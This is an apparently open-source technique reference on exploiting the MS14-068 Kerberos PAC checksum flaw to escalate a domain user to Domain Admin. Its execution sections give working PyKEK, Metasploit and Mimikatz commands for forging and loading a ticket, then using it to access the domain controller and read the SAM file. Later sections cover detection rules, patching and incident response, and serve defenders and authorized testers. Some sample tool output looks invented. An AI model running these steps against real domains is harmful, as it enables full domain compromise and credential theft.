MCADDF

[CA-KERB-007]: MS14-068 Checksum Bypass

1. METADATA HEADER

Attribute Details
Technique ID CA-KERB-007
MITRE ATT&CK v18.1 T1558 - Steal or Forge Kerberos Tickets
Tactic Privilege Escalation, Credential Access
Platforms Windows Server (2003-2012 R2) AD, Windows Client (Vista-8.1)
Severity CRITICAL
CVE CVE-2014-6324
Technique Status FIXED (November 18, 2014 via KB3011780) - But legacy unpatched systems remain vulnerable
Last Verified 2024-12-15
Affected Versions Server 2003 SP2, 2008 (SP2), 2008 R2 (SP1), 2012, 2012 R2 (all without KB3011780)
Patched In November 18, 2014 (KB3011780) - Out-of-band emergency patch
Author SERVTEPArtur Pchelnikau

Note: Sections 6 (Atomic Red Team) omitted because MS14-068 is a legacy vulnerability (2014) not covered in modern atomic test frameworks. The technique remains relevant for legacy environment assessments. All section numbers have been dynamically renumbered based on applicability.

2. EXECUTIVE SUMMARY

Concept: MS14-068 (CVE-2014-6324), known as the “Kerberos Checksum Vulnerability,” is a critical flaw in the Windows Kerberos Key Distribution Center (KDC) that allows any authenticated domain user to escalate their privileges to Domain Administrator without requiring the actual Domain Admin password. The vulnerability exists in the Privilege Attribute Certificate (PAC) validation mechanism: when a user requests a service ticket (TGS-REQ), the KDC includes the user’s authorization data (including group memberships and SID) in the PAC. On vulnerable systems, the KDC fails to validate the cryptographic signature (checksum) of this PAC, allowing an attacker to forge a PAC claiming the user is a Domain Administrator. The attacker can then use this forged ticket to impersonate a Domain Admin and access any resource in the domain. This vulnerability was actively exploited in targeted attacks starting in November 2014 and remains a serious issue on legacy systems that have not been patched.

Attack Surface: MS14-068 affects any Windows Server domain running an unpatched KDC. The attack requires only valid domain credentials (any user account, even with minimal privileges), making the attack surface enormous: every domain user can potentially exploit this. The vulnerability was so critical that Microsoft released an out-of-band (emergency) patch on November 18, 2014, just days after its discovery.

Business Impact: A single compromised domain user account (obtained via phishing, malware, or credential theft) can be escalated to full Domain Administrator privileges within minutes, enabling complete domain compromise. An attacker gains ability to access all domain resources, extract sensitive data, install persistent backdoors, modify Group Policy, reset all passwords, and establish control over the entire enterprise infrastructure.

Technical Context: The attack requires the attacker to craft a special Kerberos TGT request with a forged PAC. The PAC contains the user’s authorization data and must be signed by the KDC. The vulnerable KDC accepts a TGT with an “Include PAC: False” flag in the AS-REQ, then generates a TGT without proper PAC validation. The attacker can then request a TGS ticket where they craft the PAC to include Domain Admin group SIDs. The exploit typically takes 5-10 minutes to execute from initial credential access to Domain Admin impersonation. Modern intrusion detection can identify the attack via network signatures or event log patterns.

Operational Risk

Compliance Mappings

Framework Control / ID Description
CIS Benchmark 5.2.5.1 “Ensure Kerberos policy enforcement is configured”
DISA STIG V-3458 Windows Server 2008 SP2 Kerberos vulnerability validation
NIST 800-53 AC-3 Access Enforcement - KDC must validate PAC
NIST 800-53 SI-6 Information System Monitoring - detect anomalous tickets
GDPR Art. 32 Security of Processing - cryptographic controls
DORA Art. 9 Protection and Prevention - authentication integrity
NIS2 Art. 21 Cyber Risk Management - critical infrastructure
ISO 27001 A.9.2.1 Access control implementation and enforcement
ISO 27005 Risk Scenario Unauthorized elevation of privileges

3. TECHNICAL PREREQUISITES

Required Privileges:

Required Access:

Supported Versions:

Version Status Notes
Windows Server 2003 SP2 VULNERABLE No patch applied
Windows Server 2008 SP2 VULNERABLE Requires KB977290 + KB3011780 to fix
Windows Server 2008 R2 SP1 VULNERABLE Requires KB2982378 + KB3011780 to fix
Windows Server 2012 VULNERABLE Requires KB3011780 to fix
Windows Server 2012 R2 VULNERABLE Requires KB3011780 to fix
Windows Vista SP2 Not Vulnerable* Client-side only (no KDC component)
Windows 7 SP1 Not Vulnerable* Client-side only (no KDC component)
Windows 8, 8.1 Not Vulnerable* Client-side only (no KDC component)

*Note: Client OS versions are not vulnerable because they don’t run a KDC. However, they can be used to launch the exploit against a vulnerable DC.

Tools:

Other Requirements:

4. ENVIRONMENTAL RECONNAISSANCE

4.1 Verify Target Vulnerability

Step 1: Check Patch Status on Domain Controller

Command (PowerShell - From any domain-joined machine with admin access to DC):

# Check if KB3011780 (MS14-068 patch) is installed on DC
Get-HotFix -ComputerName DC01.contoso.com | Where-Object {$_.HotFixID -eq "KB3011780"}

# If KB3011780 is missing: VULNERABLE
# If KB3011780 is present: PATCHED

# Also check for prerequisite patches:
Get-HotFix -ComputerName DC01.contoso.com | Where-Object {$_.HotFixID -match "KB977290|KB2982378"}

# If none of these are present on Server 2008/2008 R2: VULNERABLE

Command (Remote Registry Check):

# Query registry on DC to verify patch status
$dc = "192.168.1.10"
$reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', $dc)
$key = $reg.OpenSubKey("SOFTWARE\Microsoft\Windows NT\CurrentVersion")
$version = $key.GetValue("CurrentVersion")

# Server 2008 R2: 6.1
# Server 2012: 6.2
# Server 2012 R2: 6.3

# Then check for KB3011780 via Get-HotFix

Expected Output (Vulnerable):

HotFixID    Description
--------    -----------
(No KB3011780 in output)

Expected Output (Patched):

HotFixID    Description
--------    -----------
KB3011780   Security Update

What This Means:

Step 2: Enumerate User SID (Required for Exploit)

Command (rpcclient - From Linux/Attacker Machine):

# Query DC for user SID using rpcclient (requires valid credentials)
rpcclient -U "DOMAIN\username%password" 192.168.1.10 << EOF
lookupnames username
EOF

# Output:
# username S-1-5-21-3623811015-3361044348-30300820-1107 (User: 1)
# User SID: S-1-5-21-3623811015-3361044348-30300820-1107

Command (PowerShell - From domain-joined machine):

# Query user SID via Active Directory
Get-ADUser -Identity username | Select-Object SamAccountName, ObjectSID

# Example output:
# SamAccountName: jsmith
# ObjectSID: S-1-5-21-3623811015-3361044348-30300820-1107

Command (Metasploit - Automated Enumeration):

# Use auxiliary/scanner/ldap/ldap_enum to enumerate users
msfconsole -x "use auxiliary/scanner/ldap/ldap_enum; set RHOST 192.168.1.10; set USERNAME domain\\user; set PASSWORD pass; run"

Expected Output:

User SID: S-1-5-21-3623811015-3361044348-30300820-1107
Domain SID: S-1-5-21-3623811015-3361044348-30300820

What This Means:

Step 3: Detect Kerberos Events for This Technique

Command (PowerShell - On DC, look for exploit patterns):

# Search for 4768 events with "Include PAC: False" (indicator of MS14-068 exploitation attempt)
Get-WinEvent -LogName Security -FilterXPath "*[System[(EventID=4768)]]" -MaxEvents 100 |
  Where-Object {$_.Message -match "Include PAC: False"} |
  Select-Object TimeCreated, Message

# Also look for 4769 with unusual PAC (if exploit succeeded):
# - Non-admin user requesting TGS with Domain Admin groups in PAC

Get-WinEvent -LogName Security -FilterXPath "*[System[(EventID=4769)]]" -MaxEvents 1000 |
  Where-Object {$_.Message -match "Domain Admins|Enterprise Admins"} |
  Select-Object TimeCreated, Message

What to Look For:

5. DETAILED EXECUTION METHODS AND THEIR STEPS

METHOD 1: PyKEK Exploitation (Primary / Legacy Method)

Supported Versions: Server 2003 SP2 through 2012 R2 (all without KB3011780)

Prerequisites: Attacker has valid domain credentials; PyKEK installed on attack machine (typically Linux/Exegol)

Step 1: Gather Required Information (Domain, User, SID)

Objective: Collect all parameters needed for exploitation: domain name, username, user SID, Domain SID, and target DC.

Command (Bash - Reconnaissance):

# Set variables for the attack
DOMAIN="contoso.com"
DOMAIN_DC="dc01.contoso.com"  # DC hostname or IP (e.g., 192.168.1.10)
USERNAME="jsmith"
USER_SID="S-1-5-21-3623811015-3361044348-30300820-1107"  # Obtained from reconnaissance
USER_PASSWORD="P@ssw0rd123"

# Verify DC is reachable
nslookup dc01.contoso.com
# OR
nmap -p 88 192.168.1.10  # KDC port should be open

echo "Domain: $DOMAIN"
echo "DC: $DOMAIN_DC"
echo "User: $USERNAME"
echo "User SID: $USER_SID"
echo "Password: $USER_PASSWORD"

What This Means:

Step 2: Execute PyKEK to Generate Forged TGT with Domain Admin PAC

Objective: Run the exploitation script to forge a Kerberos TGT ticket with Domain Administrator group SID in the PAC.

Command (Python 2.x - PyKEK):

# Navigate to PyKEK directory
cd /path/to/pykek

# Run ms14-068.py with required parameters
python ms14-068.py -u jsmith@contoso.com \
  -s S-1-5-21-3623811015-3361044348-30300820-1107 \
  -d 192.168.1.10 \
  -p "P@ssw0rd123"

# Parameter explanation:
# -u: User@DOMAIN format (domain is case-sensitive, usually UPPER)
# -s: User SID (discovered in reconnaissance)
# -d: DC hostname or IP address
# -p: Password for the user (must be valid)

# Output (if successful):
# [+] Building AS-REQ for contoso.com...
# [+] Sending AS-REQ to 192.168.1.10...
# [+] Receiving AS-REP from 192.168.1.10...
# [+] Building TGS-REQ for jsmith...
# [+] Forging PAC with Domain Admin groups...
# [+] Receiving TGS-REP from 192.168.1.10...
# [+] Creating ccache file 'TGT_jsmith@contoso.com.ccache'...
# [+] Done!

Expected Output (Successful Exploitation):

[+] Kerberos Exploitation successful!
[+] TGT saved as: TGT_jsmith@contoso.com.ccache
[+] File size: ~1.5 KB
[+] Ready to load into LSASS via Mimikatz

What This Means:

OpSec & Evasion:

Troubleshooting:

Step 3: Transfer Generated Ticket to Target System

Objective: Move the forged CCCache file from attacker machine to Windows system where it will be used.

Command (SCP / Network Copy):

# Copy from attacker Linux to Windows target
scp TGT_jsmith@contoso.com.ccache admin@targethost.contoso.com:C:\temp\

# Alternatively, base64 encode and paste into Windows
base64 TGT_jsmith@contoso.com.ccache > ticket.b64
# Copy ticket.b64 content, paste on Windows, and decode:
# certutil -decode ticket.b64 TGT_jsmith@contoso.com.ccache

What This Means:

Step 4: Load Forged Ticket into LSASS Using Mimikatz

Objective: Inject the forged Domain Admin TGT into Windows Local Security Authority Subsystem Service (LSASS).

Command (Mimikatz on Windows - Administrator Required):

# Load Mimikatz and inject ticket
.\mimikatz.exe "privilege::debug" `
  "kerberos::ptc c:\temp\TGT_jsmith@contoso.com.ccache" "exit"

# Or more directly:
mimikatz.exe
mimikatz # privilege::debug
mimikatz # kerberos::ptc c:\temp\TGT_jsmith@contoso.com.ccache
mimikatz # kerberos::list  # Verify ticket is loaded
mimikatz # exit

# Output:
# [+] Ticket successfully loaded into LSASS
# [+] User: jsmith @ CONTOSO.COM
# [+] Principal: krbtgt/CONTOSO.COM @ CONTOSO.COM
# [+] Flags: 0x60a10001 (INITIAL, RENEWABLE, FORWARDED)

Expected Output:

Cached Tickets (1):
  [0] - krbtgt/CONTOSO.COM @ CONTOSO.COM
  Start/End/MaxRenew: 1/6/2026 08:00:00 / 1/6/2026 18:00:00 / 1/13/2026 08:00:00

What This Means:

OpSec & Evasion:

Step 5: Use Forged Domain Admin Ticket for Lateral Movement

Objective: Leverage the Domain Admin TGT to access and compromise resources across the domain.

Command (Access DC Admin Shares):

# With the Domain Admin ticket loaded, access DC as Domain Admin
net use \\dc01.contoso.com\C$ /user:contoso.com\Administrator

# Access will be granted because ticket claims Admin privileges
dir \\dc01.contoso.com\C$

# Read sensitive files
Get-Content \\dc01.contoso.com\C$\Windows\System32\config\SAM

# Execute commands (if WinRM/PSRemote available)
Invoke-Command -ComputerName dc01.contoso.com -ScriptBlock {whoami}

# Output:
# CONTOSO\Administrator  (despite original user being jsmith)

Expected Output:

Successfully mapped to \\dc01.contoso.com\C$
Listing C:\ directory...
(Full admin access to Domain Controller filesystem)

What This Means:

References:

METHOD 2: Metasploit Automated Exploitation

Supported Versions: Server 2003 SP2 through 2012 R2 (all without KB3011780)

Step 1: Set Up Metasploit Module

Command (msfconsole):

msfconsole

# Search for the MS14-068 module
msf > search ms14_068

# Use the Kerberos checksum module
msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

# Show options
msf auxiliary(ms14_068_kerberos_checksum) > show options

# Output:
# Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
#    Name       Current Setting  Required  Description
#    ----       ---------------  --------  -----------
#    DOMAIN     (none)            yes       The Domain (upper case) Ex: DEMO.LOCAL
#    PASSWORD   (none)            yes       The Domain User password
#    RHOSTS     (none)            yes       The target address range or CIDR
#    RPORT      88               no        The target port
#    USER       (none)            yes       The Domain User
#    USER_SID   (none)            yes       The Domain User SID

What This Means:

Step 2: Configure and Execute

Command (msfconsole - Configure Parameters):

msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN CONTOSO.COM
msf auxiliary(ms14_068_kerberos_checksum) > set USER jsmith
msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD "P@ssw0rd123"
msf auxiliary(ms14_068_kerberos_checksum) > set USER_SID S-1-5-21-3623811015-3361044348-30300820-1107
msf auxiliary(ms14_068_kerberos_checksum) > set RHOSTS 192.168.1.10
msf auxiliary(ms14_068_kerberos_checksum) > set RPORT 88

# Execute the module
msf auxiliary(ms14_068_kerberos_checksum) > run

# Output:
# [*] Exploiting MS14-068 (Kerberos Checksum Validation)
# [+] Building AS-REQ
# [+] Sending to 192.168.1.10:88
# [+] Received AS-REP
# [+] Building TGS-REQ with forged PAC
# [+] Sending to 192.168.1.10:88
# [+] Received TGS-REP
# [+] Ticket exported: TGT_jsmith@CONTOSO.COM.ccache
# [+] Exploit successful!

Expected Output:

[+] Exploit successful!
[+] Ticket file: /tmp/TGT_jsmith@CONTOSO.COM.ccache
[+] Load with Mimikatz: kerberos::ptc /tmp/TGT_jsmith@CONTOSO.COM.ccache

6. TOOLS & COMMANDS REFERENCE

PyKEK

Version: Latest from GitHub
Supported Platforms: Linux, Exegol, macOS (requires Python 2.x)

Installation:

git clone https://github.com/mubix/pykek.git
cd pykek
# No additional dependencies typically needed (uses standard Python Kerberos libs)

Usage:

python ms14-068.py -u user@domain.com -s S-1-5-21-... -d dc_ip -p password

Metasploit Framework

Version: Latest (built-in MS14-068 module)
Supported Platforms: Linux, Windows, macOS

Usage:

msfconsole
use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
set DOMAIN DOMAIN.COM
set USER username
set PASSWORD pass
set USER_SID S-1-5-21-...
set RHOSTS dc_ip
run

Mimikatz

Version: Latest (2.2.0+)
Supported Platforms: Windows (x86, x64)

Usage (Load Ticket):

mimikatz.exe "privilege::debug" "kerberos::ptc c:\path\to\ticket.ccache" "exit"

7. SPLUNK DETECTION RULES

Rule 1: “Include PAC: False” Detection

SPL Query:

index=wineventlog source=WinEventLog:Security EventCode=4768
| where Message CONTAINS "Include PAC: False"
| stats count by Account_Name, Client_Address
| where count >= 1

Rule 2: Non-Admin User Accessing Domain Admin Resources

SPL Query:

index=wineventlog source=WinEventLog:Security EventCode=4769
| where Message CONTAINS "Domain Admin" AND NOT User LIKE "*admin*"
| stats count by User, Computer, Service

8. MICROSOFT SENTINEL DETECTION

Query 1: Domain Admin TGS Request from Non-Admin

KQL Query:

SecurityEvent
| where EventID == 4769
| extend Groups = extract_all("(?:Domain Admin|Enterprise Admin)", EventData)
| where array_length(Groups) > 0
| join kind=leftanti (
    SecurityEvent
    | where EventID == 4720  // User created
    | where EventData contains "Domain Admins"
    | project CreatedUser=Account_Name
  ) on $left.Account_Name == $right.CreatedUser
| project TimeGenerated, Account_Name, Computer, Groups

9. WINDOWS EVENT LOG MONITORING

Event ID: 4768 (TGT Requested)

Event ID: 4769 (TGS-REQ)

Event ID: 4771 (Pre-authentication Failed)

10. SYSMON DETECTION PATTERNS

<Sysmon schemaversion="4.82">
  <!-- Monitor for Mimikatz execution -->
  <RuleGroup name="Process Creation" groupRelation="or">
    <ProcessCreate onmatch="include">
      <CommandLine condition="contains">mimikatz</CommandLine>
      <CommandLine condition="contains">kerberos::ptc</CommandLine>
      <CommandLine condition="contains">privilege::debug</CommandLine>
    </ProcessCreate>
  </RuleGroup>

  <!-- Monitor for PyKEK/Python Kerberos exploitation -->
  <RuleGroup name="Process Creation" groupRelation="or">
    <ProcessCreate onmatch="include">
      <CommandLine condition="contains">ms14-068.py</CommandLine>
      <CommandLine condition="contains">pykek</CommandLine>
      <Image condition="contains">python</Image>
    </ProcessCreate>
  </RuleGroup>
</Sysmon>

11. MICROSOFT DEFENDER FOR CLOUD

Alert Name: “Potential Kerberos PAC forgery detected”
Alert Name: “Domain Admin impersonation via forged Kerberos ticket”

12. DEFENSIVE MITIGATIONS

Priority 1: CRITICAL

Mitigation 1: Apply KB3011780 Patch Immediately

Applies To Versions: All Windows Server 2003-2012 R2

Manual Steps:

  1. Download KB3011780 from Microsoft
  2. Before applying: Patch your server image/builds in DEV/TEST
  3. Critical: Apply patch BEFORE running DCPromo on new DCs
  4. Deployment: Roll out across all DCs in the domain (staggered to maintain uptime)
  5. Verification: 
    Get-HotFix | Where-Object {$_.HotFixID -eq "KB3011780"}

Why This Is Critical:

Mitigation 2: Verify PAC Signature Validation is Enabled

Applies To Versions: All (Server 2003-2012 R2)

Manual Steps (Registry):

# Check ValidateKdcPacSignature setting on DC
Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters' `
  -Name ValidateKdcPacSignature

# Expected output:
# ValidateKdcPacSignature : 1  (enabled)

# If value is 0 or missing, enable it:
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters' `
  -Name ValidateKdcPacSignature -Value 1

What This Does:

Priority 2: HIGH

Mitigation 3: Monitor Kerberos Events for Exploitation Attempts

Applies To Versions: All

Manual Steps:

  1. Enable detailed Kerberos auditing: 
    auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
  2. Configure SIEM/Splunk/Sentinel to alert on:
    • Event 4768 with “Include PAC: False”
    • Event 4769 with Domain Admin groups for non-admin users
    • Patterns of rapid TGT requests followed by TGS requests

Mitigation 4: Implement PAC Signature Validation on Services

Objective: Even if a PAC is forged, prevent it from being accepted by services

Manual Steps:

Mitigation 5: Segment Network to Limit KDC Access

13. DETECTION & INCIDENT RESPONSE

Indicators of Compromise (IOCs)

Network:

Event Logs:

Files:

Processes:

Forensic Artifacts

Disk:

Memory:

Network:

Response Procedures

1. Isolate (0-5 minutes):

# Disconnect affected DC from network
Get-NetAdapter | Disable-NetAdapter -Confirm:$false

# Or via Group Policy: disable network interfaces

2. Collect Evidence (5-30 minutes):

# Export Security Event Log from 24 hours before compromise detection
Get-WinEvent -LogName Security -MaxEvents 10000 | Export-Csv Evidence.csv

# Memory dump of LSASS for ticket analysis
procdump64.exe -ma lsass.exe lsass.dmp

3. Remediate (30 mins - 2 hours):

# Apply KB3011780 if not already installed
# Reset KRBTGT password twice (invalidates all forged tickets)
Set-ADAccountPassword -Identity krbtgt -Reset -NewPassword (ConvertTo-SecureString "$(New-Guid)" -AsPlainText -Force)
Start-Sleep -Seconds 86400  # Wait 24 hours
Set-ADAccountPassword -Identity krbtgt -Reset -NewPassword (ConvertTo-SecureString "$(New-Guid)" -AsPlainText -Force)

# Disable all potentially compromised accounts
Disable-ADAccount -Identity jsmith
Step Phase Technique Description
1 Initial Access [IA-PHISH-001] Spear Phishing Attacker obtains initial user credentials via phishing
2 Credential Access [CA-KERB-007] MS14-068 (Current) Escalate to Domain Admin via PAC forgery
3 Persistence [PERSIST-KRBTGT] KRBTGT Compromise Establish long-term domain control via Golden Tickets
4 Lateral Movement [LM-DCSync] DCSync Extract all domain hashes using Domain Admin privileges
5 Impact [IMPACT-RANSOMWARE] Deploy Ransomware Encrypt entire domain with Admin privileges

15. REAL-WORLD EXAMPLES

Example 1: Active Exploitation in Targeted Attacks (November 2014)

APT Group: Unknown (targeted attacks confirmed by Microsoft)

Target: Multiple enterprise organizations globally

Timeline: November 18, 2014 (vulnerability disclosure) - Active attacks ongoing

Technique Status: Exploited in the wild immediately upon discovery; automated tools (PyKEK) released by November 18

Attack Flow:

  1. Initial compromise: Phishing email → low-privilege domain user credentials
  2. User account compromise: Stolen credentials from compromised workstation
  3. MS14-068 exploitation: Run PyKEK on attack system against unpatched DC
  4. Domain Admin TGT generation: Forged ticket with Domain Admin groups in PAC
  5. DC admin shares accessed: Read SAM, NTDS.DIT, extract all domain hashes
  6. KRBTGT compromise: Extract KRBTGT hash for persistent Golden Tickets
  7. Enterprise compromise: Attacker now has full domain control

Detection Evasion:

Impact:

Outcome:

Example 2: Laboratory / Authorized Penetration Test (2015+)

Scenario: Authorized red team assessment of legacy Windows Server 2008 R2 environment

Target: Enterprise AD infrastructure with mixed patch levels

Timeline: Single-day assessment

Technique Status: Successfully exploited unpatched 2008 R2 DC; patched 2012 R2 DCs were immune

Attack Verification:

  1. Reconnaissance: Identified Windows Server 2008 R2 DC (patch status unknown)
  2. Exploitation: Executed PyKEK against 2008 R2 DC
  3. Result: Forged Domain Admin ticket successfully generated and loaded
  4. Verification: Accessed DC admin shares as Domain Admin (despite normal user credentials)
  5. Post-exploitation: Demonstrated NTDS.DIT extraction and KRBTGT compromise

On Patched Systems:

Recommendations:

REFERENCES & AUTHORITATIVE SOURCES

This site is open source. Improve this page.